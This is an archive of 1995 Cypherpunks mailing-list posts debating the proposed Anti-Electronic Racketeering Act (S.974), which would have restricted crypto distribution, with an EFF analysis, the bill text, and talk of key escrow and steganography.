From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 12:46:51 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: def'n of "computer network"
In-Reply-To: <Pine.SUN.3.91.950713152622.22564A-100000@rwd.goucher.edu>
Message-ID: <9507131946.AA12904@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Although I hardly oppose the construction of "headerless"
cryptographic protocols, they make key management in any sort of a
reasonable system a living hell. If you work for an organization
maintaining a reasonable number of keys -- say a few hundred at some
institution -- you will have to linearly search them to find which one
is the right one. What a royal pain.

Rapid deployment in ordinary software is, of course, preferable.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 13 Jul 95 12:53:53 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: def'n of "computer network"
In-Reply-To: <9507131946.AA12904@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950713154546.22974A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> Although I hardly oppose the construction of "headerless"
> cryptographic protocols, they make key management in any sort of a
> reasonable system a living hell. If you work for an organization
> maintaining a reasonable number of keys -- say a few hundred at some
> institution -- you will have to linearly search them to find which one
> is the right one. What a royal pain.

Hmmm.  no arguement.  But seeing as it might all soon be illegal, I'd 
rather it be a possible pain than just plain impossible.

> Rapid deployment in ordinary software is, of course, preferable.

It would seem that we may be approaching the criminalization of crypto.  
In which case we'd still be in trouble.  Because they might criminalize 
the /use/ of crypto.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 13 Jul 95 12:54:12 PDT
To: perry@imsi.com
Subject: Re: def'n of "computer network"
In-Reply-To: <9507131927.AA12842@snark.imsi.com>
Message-ID: <199507131950.PAA08076@spl.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:

| > In addition, now is the time to deploy stego, on a massive scale.
| 
| I've said it before, and I'll say it again.
| 
| My opinion is that stegonography "standards" are useless. Anyone can
| try unpeeling the GIFs and see if something interesting shows up
| inside. That means that the only useful stego suffers from the defect
| that symmetric key cryptography suffers from -- you have to have made
| serious pre-arrangements with the counterparty.

	While you may be right that a standard for stego in part
defeats the purpose of stego, the problem of not having some sort of
standard means that people with non-standard platforms (for some
definition of non-standard) will be shut out.

	Standards for interaction are useful, and if the thing being
stego'd is stealth PGP'd, then I'm not sure that the data pulled out
of a stego'd GIF need be any different than noise.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 13 Jul 95 07:13:14 PDT
To: cypherpunks@toad.com
Subject: Steganography Mailing List
Message-ID: <9507131353.AA03886@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



For those who are interested:

A Steganography mailing list was created. The mail server is
in Germany, but we decided to talk english on the list.

Details can be found on http://www.thur.de/ulf/stegano/

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 15:54:08 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <ac2aef1700021004f93e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 AM 7/13/95, Douglas Barnes wrote:

>Since the Anti-Electronic Racketeering Act of 1995 might as well
>be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>Tim throw in the towel already, when the bill hasn't even made it
>through committee yet.

I'd hardly call my view "throwing in the towel." What I said clearly enough
was that the Washingtonians can throw out repressive legislation much
faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
NRA, ACLU, etc., and _not_ the Cyherpunks, who have no lobbying activities
to speak of.


>Go underground? Well, as I read it, this bill basically makes
>cypherpunks a "corrupt organization", subject to the full
>impact of the RICO statutes. With the passage of this bill, we

Indeed, this law makes the Cypherpunks group a co-conspirator. (In the same
way that the recent Omnibus Anti-Terrorism (or whatever it's callled)
criminalizes groups which support This Year's Enemies. (Like the War with
Oceania--or was it Eurasia?--the friend of today was yesterday's criminal
organization. For example, the Omnibus bill makes support of anti-PLO
groups a crime, for foreigners, as the PLO is now, this year, our "Partner
for Peace.")

>will have the same status in the US as the neo-Nazis have in
>Germany, and will have to adopt similar communications and
>organization techniques. Who knows, maybe this is the best thing
>that could happen, although I'm real curious about who will
>back off to protect their ass-ets and who will actually keep
>on chugging towards crypto anarchy.
>
>In the short term, I've renewed or started memberships in the
>organizations that are likely to fight this -- but I'm also
>fired up to get more easy-to-use software out there, and
>do what I can to help build infrastructure that can resist this
>sort of nonsense.

This is all I'm suggesting, that yet another round of trying to persuade
Congress people is a waste, and that the _traditional_ focus on technology
is a better use of our time and effort.

Others are welcome to do as they wish. I'm just expressing my view that
Washington can spin out legislation faster than we can respond....they are,
after all, using our tax dollars to generate new laws, and have
intelligence agencies and law enforcement agencies on their side with
armies of lawyers and lobbyists to help. Multi-billion dollar budgets are
also at stake.

The lobbyists for preserving liberty are few and far between.

Some would say this means Cypherpunks should step into the fray and become
a lobbying group. I don't see us as having the structure or organization to
become such a group. Those who wish to should probably form a real group to
do this, with bylaws and elected officials.

Anarchies are great, but there's no way an anarchy can have a "spokesman,"
or a budget for travel and lobbying, or a hundred other things that a
lobbying group needs. Cypherpunks--this list--is just not in a position to
be this group.


--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 12:59:49 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: laws....
In-Reply-To: <Pine.SUN.3.91.950713154546.22974A-100000@rwd.goucher.edu>
Message-ID: <9507131959.AA12939@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



By the way, I'm really sick of the naming schemes on these laws. Its
only a matter of time before some 1984ish wag creates the "Omnibus
Universal Love and Happiness Act of 1998" providing the death penalty
for possessing trace quantities of marijuana or some such. The
Orwellian names on some of these bills are simply astounding.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 13 Jul 95 13:12:18 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: mistake on my part
In-Reply-To: <22250.9507131850@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SOL.3.91.950713160218.27008G-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995 aba@atlas.ex.ac.uk wrote:

> 
> Perry Metzger <perry@imsi.com> writes on cpunks:
> > I made a small mistake -- the new bill does *not* make it a crime to
> > make crypto software available at Egghead -- but it does more or
> > less make distribution of crypto software over the internet
> > impossible if it isn't an escrow based system.
> 
> I thought there was some kind of "read my lips" type statement about
> not mandating key escrow a short while ago.  Making it illegal to not
> use escrow on the internet (in the US and certain materials) sounds
> dangerously close to mandating key escrow.
> 
> Also I remember one list member making a prediction, that as they'd
> said _definately no key escrow_, that you could bet your ass that
> meant exactly the opposite, and that it would rear it's head anytime
> soon.  I think the poster even had a prediction in terms of months,
> but don't have the original post handy, looks like he was right.
> 
> Anyway these things are in stages:
> 
> 1. voluntary key escrow
> 2. mandatory key escrow for certain materials
> 3. mandatory key escrow across the board
> 
> If they pull this off stage 2, I wonder how long till stage 3, I think
> it'll be time to leave the sinking ship while exit visas are still
> granted!

Seriously!

Looking for a place that:

(1.) is reasonably free

(2.) permits Americans to work

(3.) a person trained as an engineer can earn enough to feed and shelter
     self and 4 dependents.

Any suggestions?


> 
> Adam
> --
> ------------------ PGP.ZIP Part [025/713] -------------------
> M83PL=@FR8ES%:6Q"(F9A#)K!&_;X4TXZ?(T]6(]`>$*.^]3K*K["(239)\@F
> MHA\"<%"5(%N->/2!'>X3XPU<0!Y,F``58RK(F;K#XD2,^`F[L09CT1>MH,7/
> MC@FR+[`#J_`.6J`QW&"'YPZ4A[,XC10,0@\T1R.H\52,%3N1CI\TY('#M1)D
> -------------------------------------------------------------
> for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 16:09:37 PDT
To: "Robert A. Hayden" <cman@communities.com>
Subject: Re: Fight, or Roll Over?
Message-ID: <ac2af3ed010210041c19@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 PM 7/13/95, Robert A. Hayden wrote:
>On Thu, 13 Jul 1995, Douglas Barnes wrote:
>
>> Since the Anti-Electronic Racketeering Act of 1995 might as well
>> be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>> Tim throw in the towel already, when the bill hasn't even made it
>> through committee yet.
>
>I don't think Tim threw in the towell on this bill, but has come to
>realize that the overall war on privacy cannot be won by concentrating on
>the individual battles.  We've ALL got to take a deep breath and come up
>with a different plan of attack; a plan that the TLAs and spooks will be
>unable to defend against.  Right now, as long as we're kept busy with
>individual bills and initiatives, they have us just where they want us.

Exactly!

By causing us to go into paroxysms of activity every time they throw a new
piece of legislation over the transom, we dissipate our efforts in more
promising areas.

There's a place for lobbying--and I'm even a member of the EFF. But
lobbying is best done by those with lobbying backgrounds, legal
backgrounds, and a penchant for fund-raising.

There was once talk, in April of '93, about the Washington, D.C.
Cypherpunks group adopting "lobbying" as their own special focus area, with
educational visits to Congressional aides and attendance at crypto-related
hearings. Nothing came of this, for whatever reasons.

Why do I mention this? Most Cypherpunks live far from Washington, and our
influence is minimal. Few can travel to D.C. on even an occasional basis,
etc. (Ironically, EFF is evacuating D.C. I won't get into what their
reasons might be, but certainly they will now have even less effect. I'll
say one thing: the leaders of EFF may have realized what a trap lobbying
can become, and have chosen to instead focus on other areas.)

Anyway, Cypherpunks is a worldwide, technological-oriented group. We can do
more by spreading technology and undermining repressive legislation than we
can by being just another ineffectual lobbying group.

As I said in another message, if folks want to do it, fine.
Organizationally and financially, we are not equipped for lobbying. No
budget, no leadership, no bylaws, no tax filings, no report writings,
nothing. (Some of these things are important for lobbying, some are less
so. The "leadership" part is pretty important: who could claim to "speak"
on behalf of Cypherpunks? Nobody.)

I suggest a different organization, a different mailing list, for this effort.

--Tim May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Thu, 13 Jul 95 16:38:30 PDT
To: cypherpunks@toad.com
Subject: Re: def'n of "computer network"
Message-ID: <9507132338.AA07522@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


imsi.com!perry ("Perry E. Metzger") writes:


>My opinion is that stegonography "standards" are useless. 
> Anyone can
>try unpeeling the GIFs and see if something interesting shows up
>inside. That means that the only useful stego suffers from the defect
>that symmetric key cryptography suffers from -- you have to have made
>serious pre-arrangements with the counterparty.

Perry, I don't understand.  If the least significant bits in my gif file
follow all the "known statistical distributions", how can anyone know 
whether they are "just noise" or are an encrypted message, (asymmetric or 
symmetric, either one) unless they have the key?  Why can't there be public 
key steganography?  Perhaps existing tools are inadequate, but are they
impossible?  
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 16:35:48 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <ac2afc5802021004164a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 PM 7/13/95, Timothy C. May wrote:
>At 10:41 AM 7/13/95, Douglas Barnes wrote:
>
>>Since the Anti-Electronic Racketeering Act of 1995 might as well
>>be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
>>Tim throw in the towel already, when the bill hasn't even made it
>>through committee yet.
>
>I'd hardly call my view "throwing in the towel." What I said clearly enough
>was that the Washingtonians can throw out repressive legislation much
>faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
                   ^

I meant to say, "...than we can respond to"


--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 13 Jul 95 16:50:50 PDT
To: cypherpunks@toad.com
Subject: EFF analysis: Anti-Electronic Racketeering Act (S.974)
Message-ID: <9507132350.AA08064@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: ssteele@eff.org (Shari Steele)

*****  FEEL FREE TO DISTRIBUTE WIDELY  *****

On June 27, Senator Grassley (R-Iowa) introduced the Anti-Electronic
Racketeering Act, S.974.  The bill was designed "to prohibit certain acts
involving the use of computers in the furtherance of crimes, and for other
purposes."  Its immediate effect, among other things, would be to
criminalize the posting of any encryption software on any computer network
that foreign nationals can access (in other words, any computer network
period).  Because of poor wording, the bill would probably also criminalize
data compression and other non-cryptographic encoding schemes available on 
networks.  This includes the compression used in most of the images on 
Internet user's WWW homepages, not to mention uu and binhex encoding for 
transferring binary files via email, and even language encoding used to 
represent non-English characters, such as the SJIS scheme for representing
Japanese characters.

In addition, the bill seems to be directed at undermining two big fights
we've successfully waged in the past:  the Steve Jackson Games decision
against the United States Secret Service and the government's Clipper Chip
proposal.

Re:  Steve Jackson Games -- this bill would permit the government to avoid
the notice requirements of the Privacy Protection Act if "there is reason
to believe that the immediate seizure of such materials is necessary to
prevent the destruction or altercation [very Freudian sic!] of such
documents."  Furthermore, the government could use electronic evidence
seized that had not been particularly described in a warrant if 

"the seizure is incidental to an otherwise valid seizure, and the
government officer or employee-

   ''(A) was not aware that work product material was among the data seized;

   ''(B) upon actual discovery of the existence of work product materials, the
government officer or employee took reasonable steps to protect the privacy
interests recognized by this section, including-

   ''(i) using utility software to seek and identify electronically stored data
that may be commingled or combined with non-work product material; and

   ''(ii) upon actual identification of such material, taking reasonable steps
to protect the privacy of the material, including seeking a search warrant."  

Re:  Clipper Chip -- The bill would make it a crime "to distribute computer
software that encodes or encrypts electronic or digital communications to
computer networks that the person distributing the software knows or
reasonably should know, is accessible to foreign nationals and foreign
governments, regardless of whether such software has been designated as
nonexportable."  However, there is an exception:  "It shall be an
affirmative defense to prosecution under this section that the software at
issue used a universal decoding device or program that was provided to the
Department of Justice prior to the distribution."  This is essentially an
attempt to sneak the key "escrow" provisions of the Clipper scheme in
through a legislative back door.

Fortunately, the bill does not have a very promising future.  The bill has
no co-sponsors.  It was immediately referred to the Committee on the
Judiciary, where it currently sits.  LEXIS's bill tracking report only
gives it a 10% chance of passing out of the committee.

I thought Senator Grassley's own statement when he introduced the bill is
worth reading, so I'm attaching it here.  My favorite line is "Elliott Ness
needs to meet the Internet."  This is especially ironic in light of recent 
comparisons of hysteria about "dangerous" material on the internet, and 
Prohibition.

The bill itself follows.
Shari
------------------------------------------------------------------------
Shari Steele, Director of Legal Services                 ssteele@eff.org
Electronic Frontier Foundation                      202/861-7700 (voice)
1667 K Street, N.W., Suite 801                        202/861-1258 (fax)
Washington, DC  20006-1605                            202/861-1224 (BBS)



----------  Senator Grassley's Statement to the Senate  ----------

   Mr. President, I rise this evening to introduce the Anti-electronic
Racketeering Act of 1995. This bill makes important changes to RICO and
criminalizes deliberately using computer technology to engage in criminal
activity. I believe this bill is a reasonable, measured and strong response
to a growing problem.  According to the computer emergency and response
team at Carnegie-Mellon University, during 1994, about 40,000 computer
users were attacked. Virus hacker, the FBI's national computer crime squad
has investigated over 200 cases since 1991. So, computer crime is clearly
on the rise.

   Mr. President, I suppose that some of this is just natural. Whenever man
develops a new technology, that technology will be abused by some. And that is
why I have introduced this bill. I believe we need to seriously reconsider the
Federal Criminal Code with an eye toward modernizing existing statutes and
creating new ones. In other words, Mr. President, Elliot Ness needs to meet the
Internet.

   Mr. President, I sit on the Board of the Office of Technology Assessment.
That Office has clearly indicated that organized crime has entered cyberspace in
a big way. International drug cartels use computers to launder drug money and
terrorists like the Oklahoma City bombers use computers to conspire to commit
crimes.

   Computer fraud accounts for the loss of millions of dollars per year. And
often times, there is little that can be done about this because the computer
used to commit the crimes is located overseas. So, under my bill, overseas
computer users who employ their computers to commit fraud in the United States
would be fully subject to the Federal criminal laws.  Also under my bill, Mr.
President, the wire fraud statute which has been successfully used by
prosecutors for many users, will be amended to make fraudulent schemes which use
computers a crime.

   It is not enough to simply modernize the Criminal Code. We also have to
reconsider many of the difficult procedural burdens that prosecutors must
overcome. For instance, in the typical case, prosecutors must identify a
location in order to get a wiretapping order. But in cyberspace, it is often
impossible to determine the location. And so my bill corrects that so that if
prosecutors cannot, with the exercise of effort, give the court a location, then
those prosecutors can still get a wiretapping order. And for law enforcers-both
State and Federal-who have seized a computer which contains both contraband or
evidence and purely private material, I have created a good-faith standard so
that law enforcers are not shackled by undue restrictions but will also be
punished for bad faith.

   Mr. President, this brave new world of electronic communications and global
computer networks holds much promise. But like almost anything, there is the
potential for abuse and harm. That is why I urge my colleagues to support this
bill and that is why I urge industry to support this bill.

   On a final note, I would say that we should not be too scared of technology.
After all, we are still just people and right is still right and wrong is still
wrong. Some things change and some things do not. All that my bill does is say
you can't use computers to steal, to threaten others or conceal criminal
conduct.

   Mr. President, I ask unanimous consent that the text of the bill be printed
in the Record.

   There being no objection, the bill was ordered to be printed in the Record,
as follows:

   S. 974



   SECTION 1. SHORT TITLE.

   This Act may be cited as the ''Anti-Electronic Racketeering Act of 1995''.

   SEC. 2. PROHIBITED ACTIVITIES.

   (a) Definitions .-Section 1961(1) of title 18, United States Code, is
amended-

   (1) by striking ''1343 (relating to wire fraud)'' and inserting ''1343
(relating to wire and computer fraud)'';

   (2) by striking ''that title'' and inserting ''this title'';

   (3) by striking ''or (E)'' and inserting ''(E)''; and

   (4) by inserting before the semicolon the following: ''or (F) any act that is
indictable under section 1030, 1030A, or 1962(d)(2)''.

   (b) Use of Computer To Facilitate Racketeering Enterprise .-Section 1962 of
title 18, United States Code, is amended-

   (1) by redesignating subsection (d) as subsection (e); and

   (2) by inserting after subsection (c) the following new subsection:

   ''(d) It shall be unlawful for any person-

   ''(1) to use any computer or computer network in furtherance of a
racketeering activity (as defined in section 1961(1)); or

   ''(2) to damage or threaten to damage electronically or digitally stored
data.''.

   (c) Criminal Penalties .-Section 1963(b) of title 18, United States Code, is
amended-

   (1) by striking ''and'' at the end of paragraph (1);

   (2) by striking the period at the end of paragraph (2) and inserting '';
and''; and

   (3) by adding at the end the following new paragraph:

   ''(3) electronically or digitally stored data.''.

   (d) Civil Remedies .-Section 1964(c) of title 18, United States Code, is
amended by striking ''his property or business''.   [*S9181]  

   (e) Use as Evidence of Intercepted Wire or Oral Communications .-Section 2515
of title 18, United States Code, is amended by inserting before the period at
the end the following: '', unless the authority in possession of the intercepted
communication attempted in good faith to comply with this chapter. If the United
States or any State of the United States, or subdivision thereof, possesses a
communication intercepted by a nongovernmental actor, without the knowledge of
the United States, that State, or that subdivision, the communication may be
introduced into evidence''.

   (f) Authorization for Interception of Wire, Oral, or Electronic
Communications .-Section 2516(1) of title 18, United States Code, is amended-

   (1) by striking ''and'' at the end of paragraph (n);

   (2) by striking the period at the end of paragraph () and inserting '';
and''; and

   (3) by adding at the end the following new paragraph:

   ''(p) any violation of section 1962 of title 18.''.

   (g) Procedures for Interception .-Section 2518(4)(b) of title 18, United
States Code, is amended by inserting before the semicolon the following: ''to
the extent feasible''.

   (h) Computer Crimes .-

   (1) New prohibited activities .-Chapter 47 of title 18, United States Code,
is amended by adding at the end the following new section:

   '' 1A1030A. Racketeering-related crimes involving computers

   ''(a) It shall be unlawful-

   ''(1) to use a computer or computer network to transfer unlicensed computer
software, regardless of whether the transfer is performed for economic
consideration;

   ''(2) to distribute computer software that encodes or encrypts electronic or
digital communications to computer networks that the person distributing the
software knows or reasonably should know, is accessible to foreign nationals and
foreign governments, regardless of whether such software has been designated as
nonexportable; and

   ''(3) to use a computer or computer network to transmit a communication
intended to conceal or hide the origin of money or other assets, tangible or
intangible, that were derived from racketeering activity; and

   ''(4) to operate a computer or computer network primarily to facilitate
racketeering activity or primarily to engage in conduct prohibited by Federal or
State law.

   ''(b) For purposes of this section, each act of distributing software is
considered a separate predicate act. Each instance in which nonexportable
software is accessed by a foreign government, an agent of a foreign government,
a foreign national, or an agent of a foreign national, shall be considered as a
separate predicate act.

   ''(c) It shall be an affirmative defense to prosecution under this section
that the software at issue used a universal decoding device or program that was
provided to the Department of Justice prior to the distribution.''.

   (2) Clerical amendment .-The analysis at the beginning of chapter 47, United
States Code, is amended by adding at the end the following new item:

   ''1030A. Racketeering-related crimes involving computers.''.

   (3) Jurisdiction and venue .-Section 1030 of title 18, United States Code, is
amended by adding at the end the following new subsection:

   ''(g)(1)(A) Any act prohibited by this section that is committed using any
computer, computer facility, or computer network that is physically located
within the territorial jurisdiction of the United States shall be deemed to have
been committed within the territorial jurisdiction of the United States.

   ''(B) Any action taken in furtherance of an act described in subparagraph (A)
shall be deemed to have been committed in the territorial jurisdiction of the
United States.

   ''(2) In any prosecution under this section involving acts deemed to be
committed within the territorial jurisdiction of the United States under this
subsection, venue shall be proper where the computer, computer facility, or
computer network was physically situated at the time at least one of the
wrongful acts was committed.''.

   (i) Wire and Computer Fraud .-Section 1343 of title 18, United States Code,
is amended by striking ''or television communication'' and inserting
''television communication, or computer network or facility''.

   (j) Privacy Protection Act .-Section 101 of the Privacy Protection Act of
1980 (42 U.S.C. 2000aa) is amended-

   (1) in subsection (a)-

   (A) by striking ''or'' at the end of paragraph (1);

   (B) by striking the period at the end of paragraph (2) and inserting '';
or''; and

   (C) by adding at the end the following new paragraph:

   ''(3) there is reason to believe that the immediate seizure of such materials
is necessary to prevent the destruction or altercation of such documents.''; and

   (2) in subsection (b)-

   (A) by striking ''or'' at the end of paragraph (3);

   (B) by striking the period at the end of paragraph (4) and inserting '';
or''; and

   (C) by adding at the end the following new paragraph:

   ''(5) in the case of electronically stored data, the seizure is incidental to
an otherwise valid seizure, and the government officer or employee-

   ''(A) was not aware that work product material was among the data seized;

   ''(B) upon actual discovery of the existence of work product materials, the
government officer or employee took reasonable steps to protect the privacy
interests recognized by this section, including-

   ''(i) using utility software to seek and identify electronically stored data
that may be commingled or combined with non-work product material; and

   ''(ii) upon actual identification of such material, taking reasonable steps
to protect the privacy of the material, including seeking a search warrant.''.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 13 Jul 95 13:51:40 PDT
To: cypherpunks@toad.com
Subject: co-sponsors
Message-ID: <9507132051.AA13247@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


I searched Thomas and couldn't find any evidence of co-sponsors to the
Senate bill. Am I wrong here?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 13 Jul 95 14:00:59 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131059.AA20485@cs.umass.edu>
Message-ID: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, L. McCarthy wrote:

> STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate - June
> 27, 1995) 
> Sen. GRASSLEY
> 
> Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
> Anti-electronic Racketeering Act of 1995. This bill makes important changes
> to RICO and criminalizes deliberately using computer technology to engage in
> criminal activity. I believe this bill is a reasonable, measured and strong
> response to a growing problem. According to the computer emergency and
> response team at Carnegie-Mellon University, during 1994, about 40,000
> computer users were attacked. Virus hacker, the FBI's national computer
> crime squad has investigated over 200 cases since 1991. So, computer crime is
> clearly on the rise.

Eh, what do "virus hackers" have to do with encryption, why is it these 
morons justify the destruction of encryption by mentioning hackers and 
viruses?

Additionally, does this mean that someone outside of the USA is in danger 
of being grabbed by RICO armed thugs from Uncle Sam's cadre for writing 
crypto software and publishing it in the open?  After all, once it winds 
up on some USA site, how do we know that someone outside the USA got his 
copy of SuperDuperNSASpookFree from a non-US site?  Just to be sure, 
we'll bust both the site operator and nab the guy who wrote it next time 
he drops in, or hell, we'll have him extradited.


> Mr. President, I suppose that some of this is just natural. Whenever man
> develops a new technology, that technology will be abused by some. And that
> is why I have introduced this bill. 

Yes, whenever man develops a privacy increasing technoloy, the spooks 
will see to it, that they abuse everyone's rights to that privacy, and 
then some!

> I believe we need to seriously reconsider
> the Federal Criminal Code with an eye toward modernizing existing statutes
> and creating new ones. In other words, Mr. President, Elliot Ness needs to
> meet the Internet.

Where is Elliot Ness?  I don't see any mafia.org on the net.  Anyone here 
see any such site?

> Mr. President, I sit on the Board of the Office of Technology Assessment.
> That Office has clearly indicated that organized crime has entered cyberspace
> in a big way. International drug cartels use computers to launder drug money
> and terrorists like the Oklahoma City bombers use computers to conspire to
> commit crimes.
Was it not proven that McVeigh and Co. >DID NOT< use a computer?  THe AOL 
account was a hoax, no?  Where are the hoardes of anti-USA terrorists, 
and drug pushers on the net?  Certainly, I see no drugs.com site... web, 
ftp, email, usenet or otherwise.

> << I haven't heard much to suggest that McVeigh was using a
> << computer for anything, but we all saw this line coming, right ?
> << 3 of Tim's 4 Horsemen of the Infocalypse figure prominently here; I guess
> << Exon & Gorton have ridden off after the fourth already....

Ditto above.

> Computer fraud accounts for the loss of millions of dollars per year. And
> often times, there is little that can be done about this because the computer
> used to commit the crimes is located overseas. So, under my bill, overseas
> computer users who employ their computers to commit fraud in the United
> States would be fully subject to the Federal criminal laws. 

Yeah, so, why blame citizen units in the USA for actions outsiders 
committed.?  Why limit the spread and use of cryptographically strong 
tools from being developed in the USA?

If Joe Badguysky breaks into your house and steals your copy of PGP, then 
exports it to his fatherland, should I arrest you for that?  What if he 
breaks into your store and steals a copy off the shelf and exports it?  

Why punish the victim?

> It is not enough to simply modernize the Criminal Code. We also
> have to reconsider many of the difficult procedural burdens that prosecutors
> must overcome. For instance, in the typical case, prosecutors must identify a
> location in order to get a wiretapping order. But in cyberspace, it is often
> impossible to determine the location. And so my bill corrects that so that if
> prosecutors cannot, with the exercise of effort, give the court a location, then
> those prosecutors can still get a wiretapping order. 

Oh, the poor poor LEA's.  If they can't prove you're guilty (because you 
aren't, and there is no proof because you aren't,) let them throw you in 
jail anyway.

> << All together now: "TRUST US"
> 
> Mr. President, this brave new world of electronic communications and global
> computer networks holds much promise. But like almost anything, there is the
> potential for abuse and harm. That is why I urge my colleagues to support
> this bill and that is why I urge industry to support this bill.

And this type of bill is where the potential for abuse and harm arises.  
The harm of course is to those who will be thrown in jail for wanting 
privacy.

> On a final note, I would say that we should not be too scared of
> technology. 

Gee, who is scared?  Don't be scared, be Big Brother. :-(

> After all, we are still just people and right is still right and
> wrong is still wrong. Some things change and some things do not. 

Circular reasonings and politician's spewing?  I can see th masses 
applauding this... all wearing PJ's and bearing shaved heads watching Big 
Brother on the screen infront of them...

> All that
> my bill does is say you can't use computers to steal, to threaten others or
> conceal criminal conduct.
> 
> << Ah, if that's all it does, why not scrap the whole thing and not waste
> << the Senate's valuable time ?  After all, stealing, threatening, and
> << concealing criminal conduct are already outlawed....

So, what countries are left free of encryption regulations? (English 
speaking preffered, with affordable net access.)  Time to see about 
getting a new passport...


=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
